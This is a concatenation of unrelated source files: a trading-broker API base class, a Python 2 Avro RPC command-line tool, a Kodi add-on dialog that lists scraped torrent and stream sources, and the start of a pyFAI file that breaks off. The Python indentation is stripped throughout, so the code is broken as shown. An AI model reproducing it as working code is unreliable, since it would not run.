_base.py
|
# Builtins
import datetime as dt
import time
from pathlib import Path
import yaml
import traceback
import threading
from typing import List, Dict, Any
# External libraries
import pandas as pd
# Submodule imports
from harvest.utils import *
class API:
"""
The API class communicates with various API endpoints to perform the
necessary operations. The Base class defines the interface for all API classes to
extend and implement.
Attributes
:interval_list: A list of supported intervals.
:fetch_interval: A string indicating the interval at which the broker fetches the latest asset data.
This should be initialized in setup (see below).
"""
interval_list = [
Interval.MIN_1,
Interval.MIN_5,
Interval.MIN_15,
Interval.MIN_30,
Interval.HR_1,
Interval.DAY_1,
]
def __init__(self, path: str = None):
"""
Performs initialization of the class, such as setting the
timestamp and loading credentials.
There are three API class types: 'streamer', 'broker', and 'both'. A
'streamer' is responsible for fetching data and interacting with
the queue to store data. A 'broker' is used solely for buying and
selling stocks, cryptos, and options. Finally, 'both' indicates
that the broker both fetches data and buys and sells assets.
All subclass implementations should call this __init__ method
using `super().__init__(path)`.
:path: path to the YAML file containing credentials to communicate with the API.
If not specified, defaults to './secret.yaml'
"""
self.trader = (
None  # Allows the broker to handle the case when it runs without a trader
)
if path is None:
path = "./secret.yaml"
# Check if file exists
yml_file = Path(path)
if not yml_file.is_file() and not self.create_secret(path):
debugger.debug("Broker not initalized with account information.")
return
with open(path, "r") as stream:
self.config = yaml.safe_load(stream)
self.timestamp = now()
def create_secret(self, path: str):
"""
This method is called when the yaml file with credentials
is not found."""
raise Exception(f"{path} was not found.")
def refresh_cred(self):
"""
Most API endpoints, for security reasons, require a refresh of the access token
every now and then. This method should perform a refresh of the access token.
"""
pass
def setup(self, interval: Dict, trader=None, trader_main=None) -> None:
"""
This function is called right before the algorithm begins,
and initializes several runtime parameters like
the symbols to watch and what interval data is needed.
"""
self.trader = trader
self.trader_main = trader_main
min_interval = None
for sym in interval:
inter = interval[sym]["interval"]
# If the specified interval is not supported on this API, raise Exception
if inter < self.interval_list[0]:
raise Exception(f"Specified interval {inter} is not supported.")
# If the exact interval is not supported but can be recreated by aggregating
# candles from a more granular interval, fall back to the closest supported one
if inter not in self.interval_list:
granular_int = [i for i in self.interval_list if i < inter]
new_inter = granular_int[-1]
interval[sym]["aggregations"].append(inter)
interval[sym]["interval"] = new_inter
if min_interval is None or interval[sym]["interval"] < min_interval:
min_interval = interval[sym]["interval"]
self.interval = interval
self.poll_interval = min_interval
debugger.debug(f"Interval: {self.interval}")
debugger.debug(f"Poll Interval: {self.poll_interval}")
debugger.debug(f"{type(self).__name__} setup finished")
def start(self):
"""
This method begins streaming data from the API.
The default implementation below is for polling the API.
If your brokerage provides a streaming API, you should override
this method and configure it to use that API. In that case,
make sure to set the callback function to self.main().
"""
cur_min = -1
val, unit = expand_interval(self.poll_interval)
debugger.debug(f"{type(self).__name__} started...")
if unit == "MIN":
sleep = val * 60 - 10
while 1:
cur = now()
minutes = cur.minute
if minutes % val == 0 and minutes != cur_min:
self.timestamp = cur
self.main()
time.sleep(sleep)
cur_min = minutes
elif unit == "HR":
sleep = val * 3600 - 60
while 1:
cur = now()
minutes = cur.minute
if minutes == 0 and minutes != cur_min:
self.timestamp = cur
self.main()
time.sleep(sleep)
cur_min = minutes
else:
while 1:
cur = now()
minutes = cur.minute
hours = cur.hour
if hours == 19 and minutes == 50:
self.timestamp = cur
self.main()
time.sleep(80000)
cur_min = minutes
def main(self):
"""
This method is called at the interval specified by the user.
It should create a dictionary where each key is the symbol for an asset,
and the value is the corresponding data in the following pandas dataframe format:
Symbol
open high low close volume
timestamp
--- --- --- --- --- ---
timestamp should be an offset-aware datetime object in UTC timezone.
The dictionary should be passed to the trader by calling `self.trader_main(dict)`
"""
# Iterate through securities in the watchlist. For those whose
# intervals are due now, fetch the latest data
df_dict = {}
for sym in self.interval:
inter = self.interval[sym]["interval"]
if is_freq(self.timestamp, inter):
n = self.timestamp
latest = self.fetch_price_history(
sym, inter, n - interval_to_timedelta(inter), n
)
df_dict[sym] = latest.iloc[-1]
self.trader_main(df_dict)
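# Illustrative sketch (an assumption, not from the original source): the data
# returned by fetch_price_history() is taken to be a DataFrame with a UTC
# timestamp index and a (symbol, field) column MultiIndex, roughly:
#   idx = pd.DatetimeIndex([dt.datetime(2021, 1, 4, 14, 30, tzinfo=dt.timezone.utc)])
#   cols = pd.MultiIndex.from_product([["SPY"], ["open", "high", "low", "close", "volume"]])
#   latest = pd.DataFrame([[368.0, 369.2, 367.5, 368.9, 1_000_000]], index=idx, columns=cols)
# main() then forwards the most recent entry for each symbol to self.trader_main().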
def exit(self):
"""
This function is called after every invocation of the algorithm's handler.
The intended purpose is for brokers to clear any cache they may have created.
"""
debugger.debug(f"{type(self).__name__} exited")
def _exception_handler(func):
"""
Wrapper to handle unexpected errors in the wrapped function.
Most functions should be wrapped with this to properly handle errors, such as
when the internet connection is lost. The wrapper retries the call up to three
times, refreshing credentials between attempts.
:func: Function to wrap.
:returns: The return value of func if func runs properly.
"""
def wrapper(*args, **kwargs):
tries = 3
while tries > 0:
try:
return func(*args, **kwargs)
except Exception as e:
self = args[0]
debugger.error(f"Error: {e}")
traceback.print_exc()
debugger.error("Logging out and back in...")
args[0].refresh_cred()
tries = tries - 1
debugger.error("Retrying...")
continue
return wrapper
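# Usage sketch (an assumption, not from the original source): subclasses are
# expected to apply this decorator to methods that hit the network, e.g.
#   @API._exception_handler
#   def fetch_price_history(self, symbol, interval, start=None, end=None):
#       ...
# so that transient failures trigger a credential refresh and up to three retries.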
def _run_once(func):
""" """
def wrapper(*args, **kwargs):
self = args[0]
if self.run_count == 0:
self.run_count += 1
return func(*args, **kwargs)
return None
return wrapper
# -------------- Streamer methods -------------- #
def fetch_price_history(
self,
symbol: str,
interval: Interval,
start: dt.datetime = None,
end: dt.datetime = None,
):
"""
Fetches historical price data for the specified asset and period
using the API.
:param symbol: The stock/crypto to get data for.
:param interval: The interval of requested historical data.
:param start: The starting date of the period, inclusive.
:param end: The ending date of the period, inclusive.
:returns: A pandas dataframe, same format as main()
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_price_history`."
)
def fetch_chain_info(self, symbol: str):
"""
Returns information about the symbol's options
:param symbol: Stock symbol. Cannot use crypto.
:returns: A dict with the following keys and values:
- id: ID of the option chain
- exp_dates: List of expiration dates as datetime objects
- multiplier: Multiplier of the option, usually 100
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_chain_info`."
)
def fetch_chain_data(self, symbol: str):
"""
Returns the option chain for the specified symbol.
:param symbol: Stock symbol. Cannot use crypto.
:returns: A dataframe in the following format:
exp_date strike type
OCC
--- --- --- ---
exp_date should be a timezone-aware datetime object localized to UTC
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_chain_data`."
)
def fetch_option_market_data(self, symbol: str):
"""
Retrieves data of specified option.
:param symbol: OCC symbol of option
:returns: A dictionary:
- price: price of option
- ask: ask price
- bid: bid price
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this streamer method: `fetch_option_market_data`."
)
# ------------- Broker methods ------------- #
def fetch_stock_positions(self):
"""
Returns all current stock positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol of the stock
- avg_price: The average price the stock was bought at
- quantity: Quantity owned
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_stock_positions`. Returning an empty list."
)
return []
def fetch_option_positions(self):
"""
Returns all current option positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol of the underlying stock
- occ_symbol: OCC symbol of the option
- avg_price: Average price the option was bought at
- quantity: Quantity owned
- multiplier: How many stocks each option represents
- exp_date: When the option expires
- strike_price: Strike price of the option
- type: 'call' or 'put'
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_option_positions`. Returning an empty list."
)
return []
def fetch_crypto_positions(self):
"""
Returns all current crypto positions
:returns: A list of dictionaries with the following keys and values:
- symbol: Ticker symbol for the crypto, prepended with an '@'
- avg_price: The average price the crypto was bought at
- quantity: Quantity owned
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_crypto_positions`. Returning an empty list."
)
return []
def update_option_positions(self, positions: List[Any]):
"""
Updates entries in option_positions list with the latest option price.
This is needed as options are priced based on various metrics,
and cannot be easily calculated from stock prices.
:positions: The option_positions list in the Trader class.
:returns: Nothing
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `update_option_positions`. Doing nothing."
)
def fetch_account(self):
"""
Returns current account information from the brokerage.
:returns: A dictionary with the following keys and values:
- equity: Total assets in the brokerage
- cash: Total cash in the brokerage
- buying_power: Total buying power
- multiplier: Scale of leverage, if leveraging
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_account`."
)
def fetch_stock_order_status(self, id):
"""
Returns the status of a stock order with the given id.
:id: ID of the stock order
:returns: A dictionary with the following keys and values:
- type: 'STOCK'
- id: ID of the order
- symbol: Ticker of stock
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_stock_order_status`."
)
def fetch_option_order_status(self, id):
"""
Returns the status of an option order with the given id.
:id: ID of the option order
:returns: A dictionary with the following keys and values:
- type: 'OPTION'
- id: ID of the order
- symbol: Ticker of underlying stock
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_option_order_status`."
)
def fetch_crypto_order_status(self, id):
"""
Returns the status of a crypto order with the given id.
:id: ID of the crypto order
:returns: A dictionary with the following keys and values:
- type: 'CRYPTO'
- id: ID of the order
- symbol: Ticker of crypto
- quantity: Quantity ordered
- filled_quantity: Quantity filled so far
- side: 'buy' or 'sell'
- time_in_force: Time the order is in force
- status: Status of the order
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `fetch_crypto_order_status`."
)
def fetch_order_queue(self):
"""
Returns all current pending orders
:returns: A list of dictionaries with the following keys and values:
For stocks:
- type: "STOCK"
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- side: 'buy' or 'sell'
For options:
- type: "OPTION",
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- legs: A list of dictionaries with keys:
- id: id of leg
- side: 'buy' or 'sell'
For crypto:
- type: "CRYPTO"
- symbol: Symbol of stock
- quantity: Quantity ordered
- filled_qty: Quantity filled
- id: ID of order
- time_in_force: Time in force
- status: Status of the order
- side: 'buy' or 'sell'
"""
debugger.error(
f"{type(self).__name__} does not support this broker method: `fetch_order_queue`. Returning an empty list."
)
return []
# --------------- Methods for Trading --------------- #
def order_limit(
self,
side: str,
symbol: str,
quantity: float,
limit_price: float,
in_force: str = "gtc",
extended: bool = False,
):
"""
Places a limit order.
:symbol: symbol of asset
:side: 'buy' or 'sell'
:quantity: quantity to buy or sell
:limit_price: limit price
:in_force: 'gtc' by default
:extended: 'False' by default
:returns: A dictionary with the following keys and values:
- type: 'STOCK' or 'CRYPTO'
- id: ID of order
- symbol: symbol of asset
Raises an exception if order fails.
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `order_limit`."
)
def order_option_limit(
self,
side: str,
symbol: str,
quantity: float,
limit_price: float,
type: str,
exp_date: dt.datetime,
strike: float,
in_force: str = "gtc",
):
"""
Order an option.
:side: 'buy' or 'sell'
:symbol: symbol of asset
:in_force: 'gtc' by default
:limit_price: limit price
:quantity: quantity to sell or buy
:exp_date: expiration date
:strike: strike price
:type: 'call' or 'put'
:returns: A dictionary with the following keys and values:
- type: 'OPTION'
- id: ID of order
- symbol: symbol of asset
Raises an exception if order fails.
"""
raise NotImplementedError(
f"{type(self).__name__} does not support this broker method: `order_option_limit`."
)
# -------------- Built-in methods -------------- #
# These do not need to be re-implemented in a subclass
def buy(
self, symbol: str, quantity: int, in_force: str = "gtc", extended: bool = False
):
"""
Buys the specified asset.
:symbol: Symbol of the asset to buy
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:extended: Whether to trade in extended hours or not.
:returns: The result of order_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
buy_power = self.fetch_account()["buying_power"]
# If there is no trader, streamer must be manually set
price = self.streamer.fetch_price_history(
symbol,
self.interval[symbol]["interval"],
now() - dt.timedelta(days=7),
now(),
)[symbol]["close"][-1]
else:
buy_power = self.trader.account["buying_power"]
price = self.trader.storage.load(symbol, self.interval[symbol]["interval"])[
symbol
]["close"][-1]
limit_price = mark_up(price)
total_price = limit_price * quantity
if total_price >= buy_power:
debugger.error(
f"""Not enough buying power.\n Total price ({price} * {quantity} * 1.05 = {limit_price*quantity}) exceeds buying power {buy_power}.\n Reduce purchase quantity or increase buying power."""
)
return None
debugger.debug(f"{type(self).__name__} ordered a buy of {quantity} {symbol}")
return self.order_limit(
"buy", symbol, quantity, limit_price, in_force, extended
)
def sell(
self,
symbol: str = None,
quantity: int = 0,
in_force: str = "gtc",
extended: bool = False,
):
"""Sells the specified asset.
:symbol: Symbol of the asset to sell
:quantity: Quantity of asset to sell
:in_force: Duration the order is in force
:extended: Whether to trade in extended hours or not.
:returns: The result of order_limit(). Returns None if there is an issue with the parameters.
"""
if symbol is None:
symbol = self.watch[0]
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
price = self.streamer.fetch_price_history(
symbol,
self.interval[symbol]["interval"],
now() - dt.timedelta(days=7),
now(),
)[symbol]["close"][-1]
else:
price = self.trader.storage.load(symbol, self.interval[symbol]["interval"])[
symbol
]["close"][-1]
limit_price = mark_down(price)
debugger.debug(f"{type(self).__name__} ordered a sell of {quantity} {symbol}")
return self.order_limit(
"sell", symbol, quantity, limit_price, in_force, extended
)
def buy_option(self, symbol: str, quantity: int = 0, in_force: str = "gtc"):
"""
Buys the specified option.
:symbol: Symbol of the asset to buy, in OCC format.
:quantity: Quantity of asset to buy
:in_force: Duration the order is in force
:returns: The result of order_option_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
buy_power = self.fetch_account()["buying_power"]
price = self.streamer.fetch_option_market_data(symbol)["price"]
else:
buy_power = self.trader.account["buying_power"]
price = self.trader.streamer.fetch_option_market_data(symbol)["price"]
limit_price = mark_up(price)
total_price = limit_price * quantity
if total_price >= buy_power:
debugger.warning(
f"""
Not enough buying power 🏦.\n
Total price ({price} * {quantity} * 1.05 = {limit_price*quantity}) exceeds buying power {buy_power}.\n
Reduce purchase quantity or increase buying power."""
)
sym, date, option_type, strike = self.occ_to_data(symbol)
return self.order_option_limit(
"buy",
sym,
quantity,
limit_price,
option_type,
date,
strike,
in_force=in_force,
)
def sell_option(self, symbol: str, quantity: int = 0, in_force: str = "gtc"):
"""
Sells the specified option.
:symbol: Symbol of the asset to sell, in OCC format.
:quantity: Quantity of asset to sell
:in_force: Duration the order is in force
:returns: The result of order_option_limit(). Returns None if there is an issue with the parameters.
"""
if quantity <= 0.0:
debugger.error(
f"Quantity cannot be less than or equal to 0: was given {quantity}"
)
return None
if self.trader is None:
price = self.streamer.fetch_option_market_data(symbol)["price"]
else:
price = self.trader.streamer.fetch_option_market_data(symbol)["price"]
limit_price = mark_down(price)
sym, date, option_type, strike = self.occ_to_data(symbol)
return self.order_option_limit(
"sell",
sym,
quantity,
limit_price,
option_type,
date,
strike,
in_force=in_force,
)
# -------------- Helper methods -------------- #
def has_interval(self, interval: str):
return interval in self.interval_list
def data_to_occ(
self, symbol: str, date: dt.datetime, option_type: str, price: float
):
"""
Converts data into an OCC format string
"""
occ = symbol + ((6 - len(symbol)) * " ")
occ = occ + date.strftime("%y%m%d")
occ = occ + "C" if option_type == "call" else occ + "P"
occ = occ + f"{int(price*1000):08}"
return occ
def occ_to_data(self, symbol: str):
sym = ""
while symbol[0].isalpha():
sym = sym + symbol[0]
symbol = symbol[1:]
symbol = symbol.replace(" ", "")
date = dt.datetime.strptime(symbol[0:6], "%y%m%d")
option_type = "call" if symbol[6] == "C" else "put"
price = float(symbol[7:]) / 1000
return sym, date, option_type, price
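# Example (illustrative): data_to_occ() pads the ticker to 6 characters, then
# appends the expiry as YYMMDD, a C/P flag, and the strike * 1000 as 8 digits:
#   data_to_occ("SPY", dt.datetime(2021, 6, 18), "call", 380.0)
#   -> "SPY   210618C00380000"
# occ_to_data() reverses this, returning ("SPY", datetime(2021, 6, 18), "call", 380.0).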
def current_timestamp(self):
return self.timestamp
class StreamAPI(API):
""" """
def __init__(self, path: str = None):
super().__init__(path)
self.block_lock = (
threading.Lock()
) # Lock for streams that receive data asynchronously.
self.block_queue = {}
self.first = True
def setup(self, interval: Dict, trader=None, trader_main=None) -> None:
super().setup(interval, trader, trader_main)
self.blocker = {}
def start(self):
debugger.debug(f"{type(self).__name__} started...")
def main(self, df_dict):
"""
Streaming is event driven, so sometimes not all data comes in at once.
StreamAPI class
"""
self.block_lock.acquire()
got = [k for k in df_dict]
# First, identify which symbols need to have data fetched
# for this timestamp
if self.first:
self.needed = [
sym
for sym in self.interval
if is_freq(now(), self.interval[sym]["interval"])
]
self.timestamp = df_dict[got[0]].index[0]
debugger.debug(f"Needs: {self.needed}")
debugger.debug(f"Got data for: {got}")
missing = list(set(self.needed) - set(got))
debugger.debug(f"Still need data for: {missing}")
self.block_queue.update(df_dict)
# debugger.debug(self.block_queue)
# If all data has been received, pass on the data
if len(missing) == 0:
debugger.debug("All data received")
self.trader_main(self.block_queue)
self.block_queue = {}
self.all_recv = True
self.first = True
self.block_lock.release()
return
# If some data has not been received yet, start a timeout timer
if self.first:
timer = threading.Thread(target=self.timeout, daemon=True)
timer.start()
self.all_recv = False
self.first = False
self.needed = missing
self.got = got
self.block_lock.release()
def timeout(self):
debugger.debug("Begin timeout timer")
time.sleep(1)
if not self.all_recv:
debugger.debug("Force flush")
self.flush()
def flush(self):
# For missing data, reuse the last stored entry
self.block_lock.acquire()
for n in self.needed:
data = (
self.trader.storage.load(n, self.interval[n]["interval"])
.iloc[[-1]]
.copy()
)
data.index = [self.timestamp]
self.block_queue[n] = data
self.block_lock.release()
self.trader_main(self.block_queue)
self.block_queue = {}
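# Minimal subclass sketch (illustrative only; names and behavior are assumptions,
# not part of the original source). A polling broker would roughly look like:
#
#   class DummyBroker(API):
#       def create_secret(self, path):
#           Path(path).write_text("")  # create an empty credentials file
#           return True
#
#       def fetch_price_history(self, symbol, interval, start=None, end=None):
#           idx = pd.DatetimeIndex([now()])
#           cols = pd.MultiIndex.from_product(
#               [[symbol], ["open", "high", "low", "close", "volume"]]
#           )
#           return pd.DataFrame([[1.0, 1.0, 1.0, 1.0, 0]], index=idx, columns=cols)
#
# Streaming brokers would instead subclass StreamAPI and call self.main(df_dict)
# whenever new candles arrive.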
|
tool.py
|
#! /usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
import sys
import threading
import urlparse
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from avro import datafile, io, ipc, protocol
class GenericResponder(ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = file(proto, 'r').read()
ipc.Responder.__init__(self, protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print >> sys.stderr, "Message: %s Datum: %s" % (message.name, self.datum)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print >> sys.stderr, "Shutting down server."
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = HTTPServer(server_addr, GenericHandler)
print "Port: %s" % server.server_port
sys.stdout.flush()
server.allow_reuse_address = True
print >> sys.stderr, "Starting server."
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = file(proto, 'r').read()
requestor = ipc.Requestor(protocol.parse(proto_json), client)
print requestor.request(msg, datum)
def file_or_stdin(f):
if f == "-":
return sys.stdin
else:
return file(f)
def main(args=sys.argv):
if len(args) == 1:
print "Usage: %s [dump|rpcreceive|rpcsend]" % args[0]
return 1
if args[1] == "dump":
if len(args) != 3:
print "Usage: %s dump input_file" % args[0]
return 1
for d in datafile.DataFileReader(file_or_stdin(args[2]), io.DatumReader()):
print repr(d)
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print usage_str
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = dfr.next()
elif args[5] == "-data":
print "JSON Decoder not yet implemented."
return 1
else:
print usage_str
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print usage_str
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = dfr.next()
elif args[5] == "-data":
print "JSON Decoder not yet implemented."
return 1
else:
print usage_str
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
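# Illustrative invocations (assumed from the usage strings above, not verified):
#   python tool.py dump data.avro
#   python tool.py rpcreceive http://localhost:9090 proto.avpr MessageName -file datum.avro
#   python tool.py rpcsend    http://localhost:9090 proto.avpr MessageName -file datum.avro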
|
dialogs_list.py
|
from threading import Thread, RLock
import xbmc,os
import xbmcaddon
import xbmcgui
from resources.lib.modules import control
import time
rt_timeout = 500
def select_ext(title, scraped_items):
addonPath = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
dlg = SelectorDialog("DialogSelectList.xml", addonPath, title=title,
scraped_items=scraped_items)
with ExtendedDialogHacks():
dlg.doModal()
selection = dlg.get_selection()
del dlg
return selection
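# Illustrative note (an assumption inferred from SelectorDialog below, not from
# the original source): each entry in `scraped_items` is expected to be a dict
# with at least these keys, e.g.
#   {"scraper": "limetorrent", "quality": "1080p", "source": "torrent",
#    "info": "", "debridonly": False}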
class FanArtWindow(xbmcgui.WindowDialog):
def __init__(self):
control_background = xbmcgui.ControlImage(0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
self.addControl(control_background)
fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
if fanart and fanart != "Fanart_Image":
control_fanart = xbmcgui.ControlImage(0, 0, 1280, 720, fanart)
self.addControl(control_fanart)
class ExtendedDialogHacks(object):
def __init__(self):
self.active = False
self.hide_progress = False
self.hide_info = False
self.autohidedialogs = False
if self.autohidedialogs:
self.hide_progress = False
self.hide_info = False
if not self.hide_progress and not self.hide_info:
self.autohidedialogs = False
def __enter__(self):
self.active = True
# self.numeric_keyboard = None
self.fanart_window = FanArtWindow()
## Keyboard hack
# if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
# self.numeric_keyboard = xbmcgui.Window(10109)
# Thread(target = lambda: self.numeric_keyboard.show()).start()
# wait_for_dialog('numericinput', interval=50)
# Show fanart background
self.fanart_window.show()
# Run background task
if self.autohidedialogs:
Thread(target=self.background_task).start()
def background_task(self):
xbmc.sleep(1000)
while not xbmc.abortRequested and self.active:
if self.hide_progress:
active_window = xbmcgui.getCurrentWindowDialogId()
if active_window in [10101, 10151]:
xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)
if self.hide_info:
if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
xbmc.executebuiltin('Dialog.Close(infodialog, true)')
xbmc.sleep(100)
def __exit__(self, exc_type, exc_value, traceback):
self.active = False
# if self.numeric_keyboard is not None:
# self.numeric_keyboard.close()
# del self.numeric_keyboard
# xbmc.executebuiltin("Dialog.Close(numericinput, true)")
self.fanart_window.close()
del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
xbmcgui.WindowXMLDialog.__init__(self)
self.title = kwargs['title']
self.time_start = time.time()
self.timer_active = True
self.items = kwargs['scraped_items']
self.selection = None
self.insideIndex = -1
self.completed_steps = 0
self.selected = []
self.thread = None
self.lock = RLock()
def get_selection(self):
""" get final selection """
self.timer_active = False
return self.selected
def onInit(self):
# set title
self.label = self.getControl(1)
self.label.setLabel(self.title)
# Hide ok button
self.getControl(5).setVisible(False)
# Get active list
try:
self.list = self.getControl(6)
self.list.controlLeft(self.list)
self.list.controlRight(self.list)
self.getControl(3).setVisible(False)
except:
self.list = self.getControl(6)
# self.progress = self.getControl(2)
# populate list
self.thread = Thread(target=self._inside_root)
self.thread.start()
self.setFocus(self.list)
def onAction(self, action):
if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
if self.insideIndex == -1:
self.timer_active = False
self.close()
else:
self._inside_root(select=self.insideIndex)
def onClick(self, controlID):
if controlID == 6 or controlID == 3:
num = self.list.getSelectedPosition()
if num >= 0:
if self.insideIndex == -1:
self._inside(num)
else:
self.selection = self.items[self.insideIndex][1][num]
self.close()
def onFocus(self, controlID):
if controlID in (6, 61):
self.setFocus(self.list)
def _inside_root(self, select=-1):
with self.lock:
self.setFocus(self.list)
for links in self.items:
self.providers_name = links['scraper']
print ("Rebirth QUALITY", links['quality'])
quality = str(links['quality'])
if "k" in quality.lower(): q_icon = "4k.png"
if "1080" in quality: q_icon = "1080.png"
elif "HD" in quality: q_icon = "720.png"
else: q_icon = "sd.png"
# if self.providers_name.lower() == 'kat': q_icon = "kat.jpg"
# if self.providers_name.lower() == 'thepiratebay': q_icon = "thepiratebay.png"
# if self.providers_name.lower() == 'yify': q_icon = "yify.jpg"
# if self.providers_name.lower() == 'leetx': q_icon = "leetx.png"
# if self.providers_name.lower() == 'idope': q_icon = "idope.jpg"
# if self.providers_name.lower() == 'limetorrent': q_icon = "lime.png"
# if self.providers_name.lower() == 'eztv': q_icon = "eztv.png"
if "torrent" in str(links['source']): q_icon = "torrent.png"
if quality == '4k' or quality == '4K': q_icon = "4k.png"
try: info = links['info']
except: info = ""
if not info == "": info = " | %s" % info
if links.get('debridonly', False) == True: label = '[I]DEB[/I] | %s | %s' % (quality, links['scraper'])
else: label = '%s | %s' % (quality, links['scraper'])
label2 = "[I]" + str(links['source']) + "[/I]"
label = label + info
listitem = xbmcgui.ListItem(label=label.upper(), label2=label2.upper())
try:
pluginid = "plugin.video.rebirth"
ARTDIR = xbmc.translatePath(os.path.join('special://home/addons/' + pluginid + '/resources/skins/icons' , ''))
icon = ARTDIR + q_icon
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
self.setFocus(self.list)
# if select >= 0:
# self.list.selectItem(select)
# self.insideIndex = -1
def _inside(self, num):
if num == -1:
self._inside_root(select=self.insideIndex)
return
with self.lock:
links = self.items[num]
next = [y for x,y in enumerate(self.items) if x > num][:50]
if len(links) >= 1:
selected_link = links
self.selected.append(selected_link)
for next_scrape in next:
self.selected.append(next_scrape)
self.timer_active = False
self.close()
return
# self.list.reset()
self.insideIndex = num
def step(self):
self.completed_steps += 1
progress = self.completed_steps * 100 / self.steps
self.progress.setPercent(progress)
self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format("Select Quality ", progress,
self.completed_steps, self.steps))
# BACKGROUND TIMER
def _populate(self, result):
# Delay population to let ui settle
# Remember selected item
selectedItem = None
if self.insideIndex == -1:
selectedIndex = self.list.getSelectedPosition()
else:
selectedIndex = self.insideIndex
if selectedIndex >= 0:
selectedItem = self.items[selectedIndex]
# Add new item
# if len(self.items) >= 10:
# self.sort_method()
self.items.extend(result)
self.setFocus(self.list)
if selectedItem is not None:
selectedIndex = self.items.index(selectedItem)
if self.insideIndex != -1:
self.insideIndex = selectedIndex
# Update only if in root
if self.insideIndex == -1:
self._inside_root(select=selectedIndex)
self.setFocus(self.list)
|
diffmap_widget.py
|
# coding: utf-8
#
# Project: Azimuthal integration
# https://github.com/silx-kit/pyFAI
#
# Copyright (C) 2015-2022 European Synchrotron Radiation Facility, Grenoble, France
#
